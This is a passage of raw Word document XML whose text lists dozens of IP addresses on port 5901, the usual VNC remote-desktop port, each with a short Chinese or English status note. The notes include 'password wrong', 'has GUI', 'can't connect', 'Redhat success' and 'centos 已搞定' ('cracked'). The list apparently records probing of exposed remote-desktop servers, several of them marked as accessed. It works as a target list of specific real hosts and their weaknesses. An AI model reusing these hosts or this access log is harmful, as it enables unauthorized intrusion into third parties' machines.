        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>密码不对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.13.124.218:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.13.124.217:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="006D6DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Redhat success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>密码不对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.13.124.222:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="006D6DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Redhat success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>密码不对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.30.108.180:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.4.17.2:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.4.17.141:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.4.17.140:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.4.23.116:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.4.217.247:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.4.217.249:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.4.217.245:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.4.20.225:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.21.198.23:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.21.198.21:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.53.169.16:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>112.53.169.17:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.53.169.19:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.53.169.18:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">113.106.90.146:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.131.221.98:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.147.156.153:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.147.156.152:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.192.73.20:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.192.73.21:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.193.15.105:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.4.21:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.85.134:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无界面但是无法进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>single</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>120.197.4.21:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.93.91:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.230.184:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.230.172:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>error socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.235.5:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.230.162:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">connection closed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.230.168:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>error socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.204.199.22:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.203.2.10:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.209.173.52:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.236.25.238:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.136.168.125:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.224.8.180:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">183.224.8.183:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.232.25.250:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.232.144.254:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.250.27.12:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.98.225.252:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.98.152.167:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.98.225.253:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.103.3.28:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安卓</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.164.38.90:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.29.107.55:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.138.100.78:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.138.250.236:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.139.4.26:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.140.2.123:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.133:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.141.137.13:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.140.148.140:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.29.142:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>211.142.29.148:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>211.140.189.6:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>211.142.29.134:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>211.142.29.156:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>211.142.29.152:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>211.142.29.158:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>211.142.29.135:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.105.134:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.105.14:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.134.137:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.146.94:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.139.178:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.200.79:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.200.42:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.142.200.80:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.143.231.41:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安卓系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>擦</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.139.119.94:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.143.239.163:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.144.102.99:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.144.219.70:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.24.71.101:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4D9B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4D9B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4D9B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>之前</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.62.89.135:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
    </w:p>
